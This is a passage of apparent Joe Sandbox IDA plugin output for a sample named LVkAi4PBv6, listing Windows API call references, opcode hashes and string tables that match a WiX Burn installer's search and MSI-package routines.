                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00878770,00000000,00000000,00000000,00000000,00000000), ref: 008A4925
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00878770,00000000,00000000,00000000,00000000,00000000), ref: 008A492F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2976181284-2967768451
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00863877
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00863881
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 008638EA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1230559179-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00863BB6,00000000,?,00861474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008613B8), ref: 00863A20
                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,00863BB6,00000000,?,00861474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008613B8,000001C7,00000100), ref: 00863A27
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00863BB6,00000000,?,00861474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008613B8,000001C7,00000100,?), ref: 00863A31
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 406640338-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 008A35F8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,008A3609,00000000,?,00000000), ref: 008A3069
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0088C025,?,00865405,?,00000000,?), ref: 008A3075
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 52713655-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00878BD3,0000001C,80070490,00000000,00000000,80070490), ref: 008634D5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FolderPath
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1514166925-0
APIs
• FreeLibrary.KERNELBASE(00000000,00000000,0086556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A2F0B
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0089F491
  • Part of subcall function 008A998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008A9A09
  • Part of subcall function 008A998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008A9A1A
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0089F491
  • Part of subcall function 008A998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008A9A09
  • Part of subcall function 008A998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008A9A1A
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0089F491
  • Part of subcall function 008A998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008A9A09
  • Part of subcall function 008A998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008A9A1A
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008A966B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008A9A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008A9A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d409d72a66f43b31c093d7f9e193fbf954cdcdc702dbaf419378d5c6781b06da
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a37ebb353e9434f8cf3b9bbaf8523fc921da4e712155f4de6512be297e916fd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d409d72a66f43b31c093d7f9e193fbf954cdcdc702dbaf419378d5c6781b06da
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97B012922AC205BC3A8C51882E47E37092CFAC2B15731811FF151D1540ECA48C094133
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008A966B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008A9A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008A9A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ca8fb73467cb3ae09c1e1d06199a1932cf2282c2ebaa21de4f4a946fc421fb77
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3271bf847357ecc71e3384aea90bbed2024b570652a548e57957b41b3681ca59
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca8fb73467cb3ae09c1e1d06199a1932cf2282c2ebaa21de4f4a946fc421fb77
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3B012D22AC109BC3A4C11446C87D37092CFAC2B15731C11FF151E0440ACA08C084233
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008A966B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008A9A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008A9A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4120fcffade4ed64f5cda90cbaa88fab09cb145b5ca1fdd3e33156ced1cbc892
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8b1366445cadb797a29ae1d54d0d0aa66b0d791dcc8dade29a7c14e3635234a7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4120fcffade4ed64f5cda90cbaa88fab09cb145b5ca1fdd3e33156ced1cbc892
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADB012922AC006BC364C51481C07E37092CF6C2B15331C21FF551C1540ECA08C0C4133
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,008621A8,?,00000000,?,00000000,?,0086390C,00000000,?,00000104), ref: 008614E8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: HeapSize.KERNEL32(00000000,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BE2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3492610842-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 27aad52ad402ddda693ba1f54d2fb7a322067ab3bbcd8bf9fdf8255b594310a7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5fc28bff286fd0c6c6456e71745b85e33433d431515f0dbb3d74ab7b34864c15
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27aad52ad402ddda693ba1f54d2fb7a322067ab3bbcd8bf9fdf8255b594310a7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8101D63320022DABCF115E54DC8CF9AB766FF84764F1A4215FA17DB153DA319C008695
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0086B11C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,008ACA9C,000000FF,DirectorySearch,000000FF,008ACA9C,Condition,feclient.dll,008ACA9C,Variable,?,008ACA9C,008ACA9C,?,?), ref: 0086AA29
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0086AA7E
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 0086AA9A
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 0086AABE
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0086AB11
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0086AB2B
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 0086AB53
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 0086AB91
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 0086ABB0
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 0086ABCF
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 0086AC8D
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 0086ACA7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: VariantInit.OLEAUT32(?), ref: 008A3309
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: SysAllocString.OLEAUT32(?), ref: 008A3325
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: VariantClear.OLEAUT32(?), ref: 008A33AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: SysFreeString.OLEAUT32(00000000), ref: 008A33B7
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 0086AD06
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 0086AD28
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0086AD48
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 0086AE20
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0086AFFE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
                                                                                                                                                                                                                                                                                                  • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to add patch properties to argument string., xrefs: 008844FD
                                                                                                                                                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 0088434F
                                                                                                                                                                                                                                                                                                  • Failed to install MSI package., xrefs: 00884746
                                                                                                                                                                                                                                                                                                  • Failed to add feature action properties to argument string., xrefs: 008844B9
                                                                                                                                                                                                                                                                                                  • Failed to perform minor upgrade of MSI package., xrefs: 00884638
                                                                                                                                                                                                                                                                                                  • REINSTALL=ALL, xrefs: 008845D3, 0088464D
                                                                                                                                                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 008846A5, 00884784
                                                                                                                                                                                                                                                                                                  • Failed to add reboot suppression property on install., xrefs: 008845BB
                                                                                                                                                                                                                                                                                                  • VersionString, xrefs: 0088428E, 008842EF
                                                                                                                                                                                                                                                                                                  • REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 008845F5
                                                                                                                                                                                                                                                                                                  • Failed to add feature action properties to obfuscated argument string., xrefs: 008844DB
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 0088440A
                                                                                                                                                                                                                                                                                                  • feclient.dll, xrefs: 008842C5, 0088434D, 0088441D, 0088454B, 008847D8
                                                                                                                                                                                                                                                                                                  • Failed to add reboot suppression property on uninstall., xrefs: 0088477D
                                                                                                                                                                                                                                                                                                  • msasn1.dll, xrefs: 0088440B
                                                                                                                                                                                                                                                                                                  • Failed to run maintanance mode for MSI package., xrefs: 008846F6
                                                                                                                                                                                                                                                                                                  • Failed to add ADMIN property on admin install., xrefs: 0088471E
                                                                                                                                                                                                                                                                                                  • WixBundleExecutePackageAction, xrefs: 008843B7, 008848B4
                                                                                                                                                                                                                                                                                                  • %ls %ls=ALL, xrefs: 008846B6, 00884795
                                                                                                                                                                                                                                                                                                  • Failed to add patch properties to obfuscated argument string., xrefs: 0088451F
                                                                                                                                                                                                                                                                                                  • REBOOT=ReallySuppress, xrefs: 008845A0, 0088476C
                                                                                                                                                                                                                                                                                                  • Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 0088469B
                                                                                                                                                                                                                                                                                                  • Failed to add the list of dependencies to ignore to the properties., xrefs: 008846CA
                                                                                                                                                                                                                                                                                                  • Failed to add obfuscated properties to argument string., xrefs: 00884497
                                                                                                                                                                                                                                                                                                  • Failed to build MSI path., xrefs: 0088439D
                                                                                                                                                                                                                                                                                                  • Failed to uninstall MSI package., xrefs: 008847EF
                                                                                                                                                                                                                                                                                                  • WixBundleExecutePackageCacheFolder, xrefs: 0088436A, 008848A4
                                                                                                                                                                                                                                                                                                  • Failed to add properties to argument string., xrefs: 00884463
                                                                                                                                                                                                                                                                                                  • Failed to add reinstall all property on minor upgrade., xrefs: 008845EA
                                                                                                                                                                                                                                                                                                  • ACTION=ADMIN, xrefs: 00884709
                                                                                                                                                                                                                                                                                                  • Failed to initialize external UI handler., xrefs: 008843F4
                                                                                                                                                                                                                                                                                                  • %ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 00884687
                                                                                                                                                                                                                                                                                                  • Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 0088460C
                                                                                                                                                                                                                                                                                                  • Failed to enable logging for package: %ls to: %ls, xrefs: 0088441F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 008A17B1
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A17BB
                                                                                                                                                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 008A1808
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A180E
                                                                                                                                                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 008A1848
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A184E
